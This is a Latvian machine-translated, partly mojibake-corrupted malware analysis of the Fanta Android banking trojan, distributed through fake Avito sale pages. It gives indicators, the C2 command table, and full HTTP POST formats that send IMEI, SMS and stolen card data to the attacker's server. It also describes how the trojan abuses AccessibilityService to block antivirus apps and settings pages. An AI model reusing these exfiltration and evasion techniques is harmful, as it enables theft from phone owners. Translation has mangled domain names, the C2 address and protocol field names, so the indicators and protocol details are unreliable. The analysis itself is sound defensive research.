KÄdu dienu vÄlaties kaut ko pÄrdot vietnÄ Avito un, ievietojot detalizÄtu sava produkta aprakstu (piemÄram, RAM moduli), saÅemsit Å”Ädu ziÅojumu:
Kad noklikŔķinÄsit uz pogas TurpinÄt, jÅ«su Android ierÄ«cÄ tiks lejupielÄdÄts APK fails ar ikonu un uzticamÄ«bu iedvesmojoÅ”u nosaukumu. JÅ«s instalÄjÄt aplikÄciju, kas nez kÄpÄc pieprasÄ«ja AccessibilityService tiesÄ«bas, tad parÄdÄ«jÄs pÄris logi un Ätri pazuda un... Viss.
JÅ«s dodaties, lai pÄrbaudÄ«tu savu bilanci, bet kÄda iemesla dÄļ jÅ«su bankas lietotne atkal pieprasa jÅ«su kartes informÄciju. PÄc datu ievadÄ«Å”anas notiek kaut kas Å”ausmÄ«gs: kÄda jums joprojÄm neskaidra iemesla dÄļ no jÅ«su konta sÄk pazust nauda. JÅ«s mÄÄ£inÄt atrisinÄt problÄmu, bet tÄlrunis pretojas: tas nospiež taustiÅus āAtpakaļā un āSÄkumsā, neizslÄdzas un neļauj aktivizÄt nekÄdus droŔības pasÄkumus. RezultÄtÄ tu paliec bez naudas, tavas preces nav iegÄdÄtas, esi apmulsis un brÄ«nies: kas noticis?
Atbilde ir vienkÄrÅ”a: jÅ«s esat kļuvis par Android Trojas zirga Fanta upuri, kas ir Flexnet Ä£imenes loceklis. KÄ tas notika? Paskaidrosim tagad.
Autori: Andrejs Polovinkins, jaunÄkais speciÄlists ļaunprÄtÄ«gas programmatÅ«ras analÄ«zÄ, Ivans Pisarevs, ļaunprÄtÄ«gas programmatÅ«ras analÄ«zes speciÄlists.
Daži statistikas dati
Android Trojas zirgu Flexnet saime pirmo reizi kļuva zinÄma 2015. gadÄ. Diezgan ilga darbÄ«bas laikÄ Ä£imene paplaÅ”inÄjÄs lÄ«dz vairÄkÄm pasugÄm: Fanta, Limebot, Lipton utt. Trojas zirgs, kÄ arÄ« ar to saistÄ«tÄ infrastruktÅ«ra nestÄv uz vietas: tiek izstrÄdÄtas jaunas efektÄ«vas izplatÄ«Å”anas shÄmas - mÅ«su gadÄ«jumÄ augstas kvalitÄtes pikŔķerÄÅ”anas lapas, kas paredzÄtas konkrÄtam lietotÄjam-pÄrdevÄjam, un Trojas zirgu izstrÄdÄtÄji seko modes tendencÄm vÄ«rusu rakstÄ«Å”ana - jaunas funkcionalitÄtes pievienoÅ”ana, kas ļauj efektÄ«vÄk zagt naudu no inficÄtÄm ierÄ«cÄm un apiet aizsardzÄ«bas mehÄnismus.
Å ajÄ rakstÄ aprakstÄ«tÄ kampaÅa ir paredzÄta lietotÄjiem no Krievijas, neliels skaits inficÄto ierÄ«Äu reÄ£istrÄts UkrainÄ, bet vÄl mazÄks skaits ā KazahstÄnÄ un BaltkrievijÄ.
Lai gan Flexnet ir Android Trojas arÄnÄ jau vairÄk nekÄ 4 gadus un to ir detalizÄti pÄtÄ«juÅ”i daudzi pÄtnieki, tas joprojÄm ir labÄ formÄ. SÄkot ar 2019. gada janvÄri, iespÄjamais zaudÄjumu apjoms ir vairÄk nekÄ 35 miljoni rubļu ā un tas attiecas tikai uz kampaÅÄm KrievijÄ. 2015. gadÄ pagrÄ«des forumos tika pÄrdotas dažÄdas Ŕī Android Trojas zirga versijas, kur varÄja atrast arÄ« Trojas zirga pirmkodu ar detalizÄtu aprakstu. Tas nozÄ«mÄ, ka postÄ«jumu statistika pasaulÄ ir vÄl iespaidÄ«gÄka. Nav slikts rÄdÄ«tÄjs tÄdam vecim, vai ne?
No pÄrdoÅ”anas lÄ«dz maldinÄÅ”anai
KÄ redzams no iepriekÅ” uzrÄdÄ«tÄ pikŔķerÄÅ”anas lapas ekrÄnuzÅÄmuma interneta pakalpojumam Avito sludinÄjumu ievietoÅ”anai, tas bija sagatavots konkrÄtam upurim. AcÄ«mredzot uzbrucÄji izmanto vienu no Avito parsÄtÄjiem, kas izvelk pÄrdevÄja tÄlruÅa numuru un vÄrdu, kÄ arÄ« preces aprakstu. PÄc lapas paplaÅ”inÄÅ”anas un APK faila sagatavoÅ”anas cietuÅ”ajam tiek nosÅ«tÄ«ta SMS ar viÅa vÄrdu un saiti uz pikŔķerÄÅ”anas lapu, kurÄ ir viÅa preces apraksts un summa, kas saÅemta no preces āpÄrdoÅ”anasā. NoklikŔķinot uz pogas, lietotÄjs saÅem ļaunprÄtÄ«gu APK failu - Fanta.
DomÄna shcet491[.]ru izpÄte parÄdÄ«ja, ka tas ir deleÄ£Äts Hostinger DNS serveriem:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
DomÄna zonas failÄ ir ieraksti, kas norÄda uz IP adresÄm 31.220.23[.]236, 31.220.23[.]243 un 31.220.23[.]235. TomÄr domÄna primÄrÄ resursa ieraksts (A ieraksts) norÄda uz serveri ar IP adresi 178.132.1[.]240.
IP adrese 178.132.1[.]240 atrodas NÄ«derlandÄ un pieder mitinÄtÄjam WorldStream. IP adreses 31.220.23[.]235, 31.220.23[.]236 un 31.220.23[.]243 atrodas ApvienotajÄ KaralistÄ un pieder dalÄ«tÄ mitinÄÅ”anas serverim HOSTINGER. Lietots kÄ ierakstÄ«tÄjs openprov-ru. Uz IP adreses 178.132.1[.]240 tika atdalÄ«ti arÄ« Å”Ädi domÄni:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
JÄatzÄ«mÄ, ka saites Å”ÄdÄ formÄtÄ bija pieejamas gandrÄ«z visos domÄnos:
http://(www.){0,1}<%domain%>/[0-9]{7}
Å ajÄ veidnÄ ir iekļauta arÄ« saite no Ä«sziÅas. Pamatojoties uz vÄsturiskajiem datiem, tika konstatÄts, ka viens domÄns atbilst vairÄkÄm saitÄm iepriekÅ” aprakstÄ«tajÄ shÄmÄ, kas norÄda, ka viens domÄns tika izmantots Trojas zirga izplatÄ«Å”anai vairÄkiem upuriem.
PalÄksim nedaudz uz priekÅ”u: Trojas zirgs, kas lejupielÄdÄts, izmantojot saiti no SMS, izmanto adresi kÄ vadÄ«bas serveri onusedseddohap[.]klubs. Å is domÄns tika reÄ£istrÄts 2019-03-12, un, sÄkot ar 2019-04-29, APK lietojumprogrammas mijiedarbojÄs ar Å”o domÄnu. Pamatojoties uz datiem, kas iegÅ«ti no VirusTotal, kopÄ ar Å”o serveri mijiedarbojÄs 109 lietojumprogrammas. Pats domÄns tika atrisinÄts lÄ«dz IP adresei 217.23.14[.]27, kas atrodas NÄ«derlandÄ un pieder saimniekam WorldStream. Lietots kÄ ierakstÄ«tÄjs vÄrda lÄta. Uz Å”o IP adresi tika atrisinÄti arÄ« domÄni bad-racoon[.]klubs (sÄkot no 2018-09-25) un bad-racoon[.]tieÅ”raidÄ (sÄkot no 2018-10-25). Ar domÄnu bad-racoon[.]klubs ar vairÄk nekÄ 80 APK failiem bad-racoon[.]tieÅ”raidÄ - vairÄk nekÄ 100.
KopumÄ uzbrukums attÄ«stÄs Å”Ädi:
Kas ir zem Fantas vÄka?
TÄpat kÄ daudzi citi Android Trojas zirgi, Fanta spÄj lasÄ«t un sÅ«tÄ«t Ä«sziÅas, veikt USSD pieprasÄ«jumus un parÄdÄ«t savus logus virs lietojumprogrammÄm (tostarp banku programmÄm). TomÄr Ŕīs Ä£imenes funkcionalitÄtes arsenÄls ir pienÄcis: Fanta sÄka lietot PieejamÄ«bas pakalpojums dažÄdiem mÄrÄ·iem: citu lietojumprogrammu paziÅojumu satura lasÄ«Å”anai, Trojas zirga atklÄÅ”anas un darbÄ«bas apturÄÅ”anas novÄrÅ”anai inficÄtÄ ierÄ«cÄ utt. Fanta darbojas visÄs Android versijÄs, kas nav jaunÄkas par 4.4. Å ajÄ rakstÄ mÄs sÄ«kÄk aplÅ«kosim Å”Ädu Fanta paraugu:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Uzreiz pÄc palaiÅ”anas
TÅ«lÄ«t pÄc palaiÅ”anas Trojas zirgs paslÄpj savu ikonu. Lietojumprogramma var darboties tikai tad, ja inficÄtÄs ierÄ«ces nosaukums nav sarakstÄ:
- android_x86
- VirtualBox
- Nexus 5X (bults)
- Nexus 5 (žilete)
Å Ä« pÄrbaude tiek veikta Trojas zirga galvenajÄ pakalpojumÄ - GalvenaisService. Palaižot pirmo reizi, lietojumprogrammas konfigurÄcijas parametri tiek inicializÄti uz noklusÄjuma vÄrtÄ«bÄm (konfigurÄcijas datu glabÄÅ”anas formÄts un to nozÄ«me tiks apspriesta vÄlÄk), un vadÄ«bas serverÄ« tiek reÄ£istrÄta jauna inficÄta ierÄ«ce. Serverim tiks nosÅ«tÄ«ts HTTP POST pieprasÄ«jums ar ziÅojuma veidu register_bot un informÄcija par inficÄto ierÄ«ci (Android versija, IMEI, tÄlruÅa numurs, operatora nosaukums un valsts kods, kurÄ operators ir reÄ£istrÄts). Adrese kalpo kÄ vadÄ«bas serveris hXXp://onuseseddohap[.]club/controller.php. Atbildot uz to, serveris nosÅ«ta ziÅojumu ar laukiem bot_id, bot_pwd, serveris ā lietojumprogramma saglabÄ Å”Ä«s vÄrtÄ«bas kÄ CnC servera parametrus. Parametrs serveris neobligÄti, ja lauks nav saÅemts: Fanta izmanto reÄ£istrÄcijas adresi - hXXp://onuseseddohap[.]club/controller.php. CnC adreses maiÅas funkciju var izmantot, lai atrisinÄtu divas problÄmas: vienmÄrÄ«gi sadalÄ«t slodzi starp vairÄkiem serveriem (ja ir liels inficÄto ierÄ«Äu skaits, neoptimizÄta tÄ«mekļa servera slodze var bÅ«t augsta), kÄ arÄ« izmantot alternatÄ«vs serveris kÄda no CnC serveriem atteices gadÄ«jumÄ.
Ja pieprasÄ«juma nosÅ«tÄ«Å”anas laikÄ rodas kļūda, Trojas zirgs atkÄrtos reÄ£istrÄcijas procesu pÄc 20 sekundÄm.
Kad ierÄ«ce ir veiksmÄ«gi reÄ£istrÄta, Fanta lietotÄjam parÄdÄ«s Å”Ädu ziÅojumu:
SvarÄ«ga piezÄ«me: dienests zvanÄ«ja SistÄmas droŔība ā Trojas pakalpojuma nosaukums un pÄc noklikŔķinÄÅ”anas uz pogas ŠŠ Tiks atvÄrts logs ar inficÄtÄs ierÄ«ces pieejamÄ«bas iestatÄ«jumiem, kurÄ lietotÄjam ir jÄpieŔķir piekļuves tiesÄ«bas ļaunprÄtÄ«gajam pakalpojumam:
TiklÄ«dz lietotÄjs ieslÄdzas PieejamÄ«bas pakalpojums, Fanta iegÅ«st piekļuvi lietojumprogrammu logu saturam un tajos veiktajÄm darbÄ«bÄm:
TÅ«lÄ«t pÄc pieejamÄ«bas tiesÄ«bu saÅemÅ”anas Trojas zirgs pieprasa administratora tiesÄ«bas un tiesÄ«bas lasÄ«t paziÅojumus:
Izmantojot AccessibilityService, lietojumprogramma simulÄ taustiÅsitienus, tÄdÄjÄdi pieŔķirot sev visas nepiecieÅ”amÄs tiesÄ«bas.
Fanta izveido vairÄkus datu bÄzes gadÄ«jumus (kas tiks aprakstÄ«ti vÄlÄk), kas nepiecieÅ”ami, lai saglabÄtu konfigurÄcijas datus, kÄ arÄ« procesÄ savÄkto informÄciju par inficÄto ierÄ«ci. Lai nosÅ«tÄ«tu savÄkto informÄciju, Trojas zirgs izveido atkÄrtotu uzdevumu, kas paredzÄts, lai lejupielÄdÄtu laukus no datu bÄzes un saÅemtu komandu no vadÄ«bas servera. IntervÄls piekļuvei CnC tiek iestatÄ«ts atkarÄ«bÄ no Android versijas: 5.1 gadÄ«jumÄ intervÄls bÅ«s 10 sekundes, pretÄjÄ gadÄ«jumÄ 60 sekundes.
Lai saÅemtu komandu, Fanta izdara pieprasÄ«jumu GetTask uz pÄrvaldÄ«bas serveri. Atbildot uz to, CnC var nosÅ«tÄ«t vienu no Ŕīm komandÄm:
Komanda | Apraksts |
---|---|
0 | SÅ«tÄ«t SMS ziÅu |
1 | Veiciet tÄlruÅa zvanu vai USSD komandu |
2 | Atjaunina parametru intervÄls |
3 | Atjaunina parametru krustoÅ”anÄs |
6 | Atjaunina parametru sms Manager |
9 | SÄciet Ä«sziÅu apkopoÅ”anu |
11 | Atiestatiet tÄlruni uz rÅ«pnÄ«cas iestatÄ«jumiem |
12 | IespÄjot/atspÄjot dialoglodziÅa izveides reÄ£istrÄÅ”anu |
Fanta arÄ« apkopo paziÅojumus no 70 banku lietotnÄm, Ätro maksÄjumu sistÄmÄm un e-makiem un glabÄ tos datu bÄzÄ.
KonfigurÄcijas parametru saglabÄÅ”ana
Lai saglabÄtu konfigurÄcijas parametrus, Fanta izmanto standarta pieeju Android platformai - preferences- faili. IestatÄ«jumi tiks saglabÄti failÄ ar nosaukumu iestatÄ«jumi. SaglabÄto parametru apraksts ir zemÄk esoÅ”ajÄ tabulÄ.
VÄrds | NoklusÄjuma vÄrtÄ«ba | IespÄjamÄs vÄrtÄ«bas | Apraksts |
---|---|---|---|
id | 0 | Vesels skaitlis | Bota ID |
serveris | hXXp://onuseseddohap[.]club/ | URL | KontrolÄjiet servera adresi |
pwd | SÄkot no | Rinda | Servera parole |
intervÄls | 20 | Vesels skaitlis | Laika intervÄls. NorÄda, uz cik ilgu laiku jÄatliek Å”Ädi uzdevumi:
|
krustoÅ”anÄs | visi | visi/telNumber | Ja lauks ir vienÄds ar virkni visi vai telNumber, tad saÅemtÄ SMS ziÅa tiks pÄrtverta lietojumprogrammÄ un netiks rÄdÄ«ta lietotÄjam |
sms Manager | 0 | 0/1 | IespÄjot/atspÄjot lietojumprogrammu kÄ noklusÄjuma SMS adresÄtu |
lasÄ«t dialoglodziÅu | nepatiess | Patiess/nepatiess | IespÄjot/atspÄjot notikumu reÄ£istrÄÅ”anu PieejamÄ«bas pasÄkums |
Fanta arī izmanto failu sms Manager:
VÄrds | NoklusÄjuma vÄrtÄ«ba | IespÄjamÄs vÄrtÄ«bas | Apraksts |
---|---|---|---|
pckg | SÄkot no | Rinda | IzmantotÄ Ä«sziÅu pÄrvaldnieka nosaukums |
MijiedarbÄ«ba ar datu bÄzÄm
Savas darbÄ«bas laikÄ Trojas zirgs izmanto divas datu bÄzes. Datu bÄze nosaukta a izmanto, lai saglabÄtu dažÄdu informÄciju, kas savÄkta no tÄlruÅa. OtrÄ datu bÄze ir nosaukta fanta.db un tiek izmantots, lai saglabÄtu iestatÄ«jumus, kas ir atbildÄ«gi par pikŔķerÄÅ”anas logu izveidi, kas paredzÄti informÄcijas apkopoÅ”anai par bankas kartÄm.
Trojas zirgs izmanto datu bÄzi Š° lai saglabÄtu savÄkto informÄciju un reÄ£istrÄtu savas darbÄ«bas. Dati tiek glabÄti tabulÄ Å¾urnÄli. Lai izveidotu tabulu, izmantojiet Å”Ädu SQL vaicÄjumu:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)
Datu bÄzÄ ir Å”Äda informÄcija:
1. InficÄtÄs ierÄ«ces palaiÅ”anas reÄ£istrÄÅ”ana ar ziÅojumu Telefons ieslÄdzÄs!
2. PaziÅojumi no lietojumprogrammÄm. ZiÅojums tiek Ä£enerÄts saskaÅÄ ar Å”Ädu veidni:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Bankas karÅ”u dati no Trojas zirga izveidotajÄm pikŔķerÄÅ”anas formÄm. Parametrs VIEW_NAME var bÅ«t viens no Å”iem:
- AliExpress
- Avito
- Google Play
- DažÄdi <%App Name%>
ZiÅojums tiek reÄ£istrÄts Å”ÄdÄ formÄtÄ:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) ŠŠ¾Š¼ŠµŃ ŠŗŠ°ŃŃŃ:<%CARD_NUMBER%>; ŠŠ°ŃŠ°:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. IenÄkoÅ”Äs/izejoÅ”Äs SMS ziÅas Å”ÄdÄ formÄtÄ:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Š¢ŠøŠæ: ŠŃ
Š¾Š“ŃŃŠµŠµ/ŠŃŃ
Š¾Š“ŃŃŠµŠµ) <%Mobile number%>:<%SMS-text%>
5. InformÄcija par pakotni, kas izveido dialoglodziÅu Å”ÄdÄ formÄtÄ:
(<%Package name%>)<%Package information%>
Tabulas piemÄrs žurnÄli:
Viena no Fantas funkcionalitÄtÄm ir informÄcijas vÄkÅ”ana par bankas kartÄm. Datu apkopoÅ”ana notiek, izveidojot pikŔķerÄÅ”anas logus, atverot bankas lietojumprogrammas. Trojas zirgs pikŔķerÄÅ”anas logu izveido tikai vienu reizi. InformÄcija, ka logs tika parÄdÄ«ts lietotÄjam, tiek saglabÄta tabulÄ iestatÄ«jumi datu bÄzÄ fanta.db. Lai izveidotu datu bÄzi, izmantojiet Å”Ädu SQL vaicÄjumu:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);
Visi tabulas lauki iestatÄ«jumi pÄc noklusÄjuma inicializÄts uz 1 (izveidojiet pikŔķerÄÅ”anas logu). PÄc tam, kad lietotÄjs ievadÄ«s savus datus, vÄrtÄ«ba tiks iestatÄ«ta uz 0. Tabulas lauku piemÄrs iestatÄ«jumi:
- can_login ā lauks ir atbildÄ«gs par veidlapas attÄloÅ”anu, atverot bankas pieteikumu
- pirmÄ_banka - nav izmantots
- can_avito ā lauks ir atbildÄ«gs par veidlapas parÄdÄ«Å”anu, atverot Avito lietojumprogrammu
- can_ali ā lauks ir atbildÄ«gs par veidlapas parÄdÄ«Å”anu, atverot lietojumprogrammu Aliexpress
- var_cits ā lauks ir atbildÄ«gs par veidlapas parÄdÄ«Å”anu, atverot jebkuru pieteikumu no saraksta: Yula, Pandao, Drom Auto, Wallet. Atlaižu un bonusu kartes, Aviasales, RezervÄÅ”ana, Trivago
- can_card ā lauks ir atbildÄ«gs par veidlapas parÄdÄ«Å”anu atverot Google Play
MijiedarbÄ«ba ar pÄrvaldÄ«bas serveri
TÄ«kla mijiedarbÄ«ba ar pÄrvaldÄ«bas serveri notiek, izmantojot HTTP protokolu. Lai strÄdÄtu ar tÄ«klu, Fanta izmanto populÄro Retrofit bibliotÄku. PieprasÄ«jumi tiek sÅ«tÄ«ti uz: hXXp://onuseseddohap[.]club/controller.php. Servera adresi var mainÄ«t, reÄ£istrÄjoties serverÄ«. SÄ«kfaili var tikt nosÅ«tÄ«ti kÄ atbilde no servera. Fanta serverim veic Å”Ädus pieprasÄ«jumus:
- Bota reÄ£istrÄcija vadÄ«bas serverÄ« notiek vienreiz, pÄc pirmÄs palaiÅ”anas. Uz serveri tiek nosÅ«tÄ«ti Å”Ädi dati par inficÄto ierÄ«ci:
Ā· Cepums ā no servera saÅemtie sÄ«kfaili (noklusÄjuma vÄrtÄ«ba ir tukÅ”a virkne)
Ā· mode ā virknes konstante register_bot
Ā· priedÄklis ā veselu skaitļu konstante 2
Ā· version_sdk ā tiek veidots pÄc Å”Ädas veidnes: <%Build.MODEL%>/<%Build.VERSION.RELEASE%> (Avit)
Ā· imei ā inficÄtÄs ierÄ«ces IMEI
Ā· valsts ā tÄs valsts kods, kurÄ operators reÄ£istrÄts, ISO formÄtÄ
Ā· skaits - telefona numurs
Ā· operators ā operatora nosaukumsServerim nosÅ«tÄ«ta pieprasÄ«juma piemÄrs:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
Atbildot uz pieprasÄ«jumu, serverim ir jÄatgriež JSON objekts, kurÄ ir Å”Ädi parametri:
Ā· bot_id ā inficÄtÄs ierÄ«ces ID. Ja bot_id ir vienÄds ar 0, Fanta atkÄrtoti izpildÄ«s pieprasÄ«jumu.
bot_pwd ā servera parole.
serveris ā kontrolÄt servera adresi. IzvÄles parametrs. Ja parametrs nav norÄdÄ«ts, tiks izmantota lietojumprogrammÄ saglabÄtÄ adrese.JSON objekta piemÄrs:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- PieprasÄ«jums saÅemt komandu no servera. Uz serveri tiek nosÅ«tÄ«ti Å”Ädi dati:
Ā· Cepums ā no servera saÅemtÄs sÄ«kdatnes
Ā· pieteikums ā inficÄtÄs ierÄ«ces ID, kas tika saÅemts, nosÅ«tot pieprasÄ«jumu register_bot
Ā· pwd ā servera parole
Ā· divice_admin ā lauks nosaka, vai ir iegÅ«tas administratora tiesÄ«bas. Ja ir iegÅ«tas administratora tiesÄ«bas, lauks ir vienÄds ar 1citÄdi 0
Ā· PieejamÄ«ba ā PieejamÄ«bas pakalpojuma darbÄ«bas statuss. Ja pakalpojums tika palaists, vÄrtÄ«ba ir 1citÄdi 0
Ā· SMS pÄrvaldnieks ā parÄda, vai Trojas zirgs ir iespÄjots kÄ noklusÄjuma lietojumprogramma SMS saÅemÅ”anai
Ā· ekrÄns ā parÄda, kÄdÄ stÄvoklÄ« atrodas ekrÄns. Tiks iestatÄ«ta vÄrtÄ«ba 1, ja ekrÄns ir ieslÄgts, pretÄjÄ gadÄ«jumÄ 0;Serverim nosÅ«tÄ«ta pieprasÄ«juma piemÄrs:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
AtkarÄ«bÄ no komandas serveris var atgriezt JSON objektu ar dažÄdiem parametriem:
Ā· Komanda SÅ«tÄ«t SMS ziÅu: parametri satur tÄlruÅa numuru, SMS ziÅas tekstu un sÅ«tÄmÄs ziÅas ID. Identifikators tiek izmantots, sÅ«tot ziÅojumu serverim ar veidu setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }
Ā· Komanda Veiciet tÄlruÅa zvanu vai USSD komandu: tÄlruÅa numurs vai komanda tiek parÄdÄ«ta atbildes pamattekstÄ.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }
Ā· Komanda MainÄ«t intervÄla parametru.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }
Ā· Komanda MainÄ«t pÄrtverÅ”anas parametru.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }
Ā· Komanda Mainiet lauku SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }
Ā· Komanda SavÄc SMS ziÅas no inficÄtas ierÄ«ces.
{ "response": [ { "mode": 9 } ], "status":"ok" }
Ā· Komanda Atiestatiet tÄlruni uz rÅ«pnÄ«cas iestatÄ«jumiem:
{ "response": [ { "mode": 11 } ], "status":"ok" }
Ā· Komanda Mainiet ReadDialog parametru.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- ZiÅas sÅ«tÄ«Å”ana ar veidu setSmsStatus. Å is pieprasÄ«jums tiek veikts pÄc komandas izpildes SÅ«tÄ«t SMS ziÅu. PieprasÄ«jums izskatÄs Å”Ädi:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>
- Datu bÄzes satura augÅ”upielÄde. Katram pieprasÄ«jumam tiek pÄrsÅ«tÄ«ta viena rinda. Uz serveri tiek nosÅ«tÄ«ti Å”Ädi dati:
Ā· Cepums ā no servera saÅemtÄs sÄ«kdatnes
Ā· mode ā virknes konstante setSaveInboxSms
Ā· pieteikums ā inficÄtÄs ierÄ«ces ID, kas tika saÅemts, nosÅ«tot pieprasÄ«jumu register_bot
Ā· teksts ā teksts paÅ”reizÄjÄ datu bÄzes ierakstÄ (lauks d no galda žurnÄli datu bÄzÄ Š°)
Ā· skaits ā paÅ”reizÄjÄ datu bÄzes ieraksta nosaukums (lauks p no galda žurnÄli datu bÄzÄ Š°)
Ā· sms_mode ā vesela skaitļa vÄrtÄ«ba (lauks m no galda žurnÄli datu bÄzÄ Š°)PieprasÄ«jums izskatÄs Å”Ädi:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
Ja tÄ ir veiksmÄ«gi nosÅ«tÄ«ta uz serveri, rinda tiks dzÄsta no tabulas. Servera atgrieztÄ JSON objekta piemÄrs:
{ "response":[], "status":"ok" }
Mijiedarbība ar AccessibilityService
AccessibilityService tika ieviests, lai padarÄ«tu Android ierÄ«ces vieglÄk lietojamas cilvÄkiem ar invaliditÄti. VairumÄ gadÄ«jumu, lai mijiedarbotos ar lietojumprogrammu, ir nepiecieÅ”ama fiziska mijiedarbÄ«ba. AccessibilityService ļauj tos veikt programmatiski. Fanta izmanto pakalpojumu, lai izveidotu viltus logus banku lietojumprogrammÄs un neļautu lietotÄjiem atvÄrt sistÄmas iestatÄ«jumus un dažas lietojumprogrammas.
Izmantojot AccessibilityService funkcionalitÄti, Trojas zirgs uzrauga inficÄtÄs ierÄ«ces ekrÄna elementu izmaiÅas. KÄ aprakstÄ«ts iepriekÅ”, Fanta iestatÄ«jumos ir parametrs, kas ir atbildÄ«gs par reÄ£istrÄÅ”anas darbÄ«bÄm ar dialoglodziÅiem - lasÄ«t dialoglodziÅu. Ja Å”is parametrs ir iestatÄ«ts, datu bÄzei tiks pievienota informÄcija par pakotnes nosaukumu un aprakstu, kas izraisÄ«ja notikumu. Trojas zirgs veic Å”Ädas darbÄ«bas, kad tiek aktivizÄti notikumi:
- ImitÄ atpakaļ un sÄkuma taustiÅu nospieÅ”anu Å”Ädos gadÄ«jumos:
Ā· ja lietotÄjs vÄlas pÄrstartÄt savu ierÄ«ci
Ā· ja lietotÄjs vÄlas dzÄst lietojumprogrammu āAvitoā vai mainÄ«t piekļuves tiesÄ«bas
Ā· ja lapÄ ir pieminÄta lietojumprogramma āAvitoā.
Ā· atverot lietojumprogrammu Google Play Protect
Ā· atverot lapas ar AccessibilityService iestatÄ«jumiem
Ā· kad tiek parÄdÄ«ts dialoglodziÅÅ” SistÄmas droŔība
Ā· atverot lapu ar iestatÄ«jumiem āZÄ«mÄt pÄr citu lietotniā.
Ā· atverot lapu āLietojumprogrammasā, āAtkopÅ”ana un atiestatÄ«Å”anaā, āDatu atiestatÄ«Å”anaā, āAtiestatÄ«t iestatÄ«jumusā, āIzstrÄdÄtÄja panelisā, āÄŖpaÅ”ais. iespÄjasā, āÄŖpaÅ”as iespÄjasā, āÄŖpaÅ”as tiesÄ«basā
Ā· ja notikumu Ä£enerÄja noteiktas lietojumprogrammas.Lietojumprogrammu saraksts
- android
- Master Lite
- Clean Master
- Clean Master x86 CPU
- Meizu lietojumprogrammu atļauju pÄrvaldÄ«ba
- MIUI droŔība
- Clean Master ā pretvÄ«rusu un keÅ”atmiÅas un atkritumu tÄ«rÄ«tÄjs
- VecÄku kontrole un GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock un tīmekļa droŔības beta versija
- VÄ«rusu tÄ«rÄ«tÄjs, pretvÄ«rusu lÄ«dzeklis, tÄ«rÄ«tÄjs (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivīruss un bezmaksas aizsardzība 2019
- MobilÄ droŔība MegaFon
- AVG aizsardzība Xperia
- MobilÄ droŔība
- Malwarebytes antivīruss un aizsardzība
- AntivÄ«russ operÄtÄjsistÄmai Android 2019
- DroŔības meistars - antivÄ«russ, VPN, AppLock, pastiprinÄtÄjs
- AVG antivÄ«russ Huawei planÅ”etdatora sistÄmas pÄrvaldniekam
- Samsung pieejamība
- Samsung Smart Manager
- DroŔības meistars
- Ätruma pastiprinÄtÄjs
- Dr.Web
- Dr.Web droŔības telpa
- Dr.Web mobilais vadības centrs
- Dr.Web Security Space Life
- Dr.Web mobilais vadības centrs
- AntivÄ«rusu un mobilÄ droŔība
- Kaspersky Internet Security: Antivīruss un aizsardzība
- Kaspersky akumulatora darbÄ«bas laiks: taupÄ«tÄjs un pastiprinÄtÄjs
- Kaspersky Endpoint Security ā aizsardzÄ«ba un pÄrvaldÄ«ba
- AVG Antivirus free 2019 - Android aizsardzība
- android antivīruss
- Norton Mobile Security un Antivirus
- AntivÄ«russ, ugunsmÅ«ris, VPN, mobilÄ droŔība
- MobilÄ droŔība: antivÄ«russ, VPN, aizsardzÄ«ba pret zÄdzÄ«bÄm
- AntivÄ«russ operÄtÄjsistÄmai Android
- Ja atļauja tiek pieprasÄ«ta, sÅ«tot SMS Ä«sziÅu uz Ä«so numuru, Fanta simulÄ noklikŔķinÄÅ”anu uz izvÄles rÅ«tiÅas Atcerieties izvÄli un pogu sÅ«tÄ«t.
